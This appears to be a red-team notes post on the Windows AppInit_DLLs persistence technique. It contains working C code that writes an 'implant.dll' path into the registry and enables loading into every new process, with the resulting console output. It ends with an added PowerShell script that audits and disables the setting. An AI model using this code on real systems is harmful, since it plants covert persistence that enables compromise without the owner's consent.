Red Team Notes

AppInit (Application Initialization) is an infrastructure designed to allow developers to run custom code or modify the behavior of processes during the initialization phase of applications. It was primarily used in Windows operating systems prior to Windows 8.

So every process will check the following two registry values at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

If LoadAppInit_DLLs is set to 1, the DLL specified in the AppInit_DLLs value is loaded.

Note: local admin is needed to modify values under HKLM.

So we just need to modify both registry values:

Code

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winreg.h>

#pragma comment(lib, "Advapi32.lib")

int main(void) {

    HKEY hKey;
    const char *AppInit_data = "c:\\tools\\rtnotes\\implant.dll";
    DWORD LoadInit_data = 0x1;

    // Open the key that holds both values; KEY_SET_VALUE on HKLM requires an elevated process
    LSTATUS stat = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_READ | KEY_SET_VALUE, &hKey);
    if (stat == ERROR_SUCCESS)
        printf("[+] RegOpenKeyExA successful!\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%ld)!\n", (long) stat);
        return -1;
    }

    // Setting up AppInit_DLLs. For a REG_SZ value the size passed to RegSetValueExA
    // must include the terminating null character, hence strlen() + 1.
    stat = RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (const BYTE *) AppInit_data, (DWORD) strlen(AppInit_data) + 1);
    if (stat == ERROR_SUCCESS)
        printf("[+] AppInit_DLLs modified\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%ld)!\n", (long) stat);
        RegCloseKey(hKey);
        return -1;
    }

    // Setting up LoadAppInit_DLLs (REG_DWORD, 1 = enabled)
    stat = RegSetValueExA(hKey, "LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE *) &LoadInit_data, sizeof(LoadInit_data));
    if (stat == ERROR_SUCCESS)
        printf("[+] LoadAppInit_DLLs modified\n");
    else {
        printf("[!] Error accessing registry. Are you running as admin? (%ld)!\n", (long) stat);
        RegCloseKey(hKey);
        return -1;
    }

    RegCloseKey(hKey);
    return 0;
}

After execution we can manually check the registry and see that our implant.dll has been added to the AppInit_DLLs value.

C:\Tools\rtnotes>.\rtnotes.exe
[+] RegOpenKeyExA successful!
[+] AppInit_DLLs modified
[+] LoadAppInit_DLLs modified

Finally we can launch any process, for example notepad, and check that implant.dll is loaded into each new process.

Note: remember to set HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs back to 0 to stop loading the DLL.
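Added example, not part of the original post: a PowerShell audit that reads the two values described above from both the 64-bit key and its Wow6432Node copy, lists every DLL path found, checks whether each file exists and is Authenticode-signed, and with -Remediate sets LoadAppInit_DLLs back to 0 as the note above describes. It assumes an elevated session; the Wow6432Node path and the space/comma splitting of AppInit_DLLs are the script's own assumptions.

```powershell
# Audit of the AppInit_DLLs / LoadAppInit_DLLs values (added example, not the post's code).
# Assumes an elevated PowerShell session.
param(
    [switch]$Remediate   # when set, disable loading but leave the DLL list in place as evidence
)

# Assumption: the 64-bit key and its Wow6432Node twin (used by 32-bit processes)
$keys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows'
)

foreach ($key in $keys) {
    if (-not (Test-Path -Path $key)) { continue }
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $load  = [int]($props.LoadAppInit_DLLs)      # missing value reads as 0 (disabled)
    $dlls  = [string]$props.AppInit_DLLs

    Write-Host "`n[$key]"
    Write-Host ("  LoadAppInit_DLLs : {0}" -f $load)
    Write-Host ("  AppInit_DLLs     : '{0}'" -f $dlls)

    # Assumption: several paths may be listed, separated by spaces or commas
    $entries = @($dlls -split '[ ,]+' | Where-Object { $_ -ne '' })
    foreach ($dll in $entries) {
        $exists = Test-Path -LiteralPath $dll
        $sig = if ($exists) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'n/a' }
        Write-Host ("    - {0}  exists={1}  signature={2}" -f $dll, $exists, $sig)
    }

    # Loading is only active when the switch is 1 AND a DLL is listed
    if ($load -eq 1 -and $entries.Count -gt 0) {
        Write-Warning "AppInit DLL loading is ENABLED with DLLs listed under $key"
        if ($Remediate) {
            # Same switch the post mentions at the end: 0 stops the listed DLLs from loading
            Set-ItemProperty -Path $key -Name LoadAppInit_DLLs -Value 0 -Type DWord
            Write-Host "    LoadAppInit_DLLs set to 0 (AppInit_DLLs left in place for analysis)"
        }
    }
}
```

Run it without -Remediate first to record the findings; an unsigned or missing DLL in the list together with LoadAppInit_DLLs = 1 is the condition worth escalating.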